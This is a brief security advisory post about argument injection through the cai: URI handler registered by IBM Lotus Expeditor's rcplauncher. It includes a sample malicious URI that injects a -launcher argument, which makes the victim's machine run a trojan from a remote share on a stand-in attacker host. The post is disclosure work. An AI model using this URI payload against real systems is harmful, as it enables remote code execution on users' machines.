Hello
Lotus expeditor rcplauncher registers a cai: uri handler.
This handler executes
"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe"
-config notes -com.ibm.rcp.portal.app.ui#openCA "%1"
the rcplauncher process accepts various arguments which can be abused
to execute arbitrary code.
The argument to the -launcher option for example is an executable
that will be executed.
malicious uri example:
cai:"%20-launcher%20\\hostile.com\d$\trojan
original advisory :
http://thomas.pollet.googlepages.com/lotusexpeditorurihandlervulnerability
Regards,
Thomas Pollet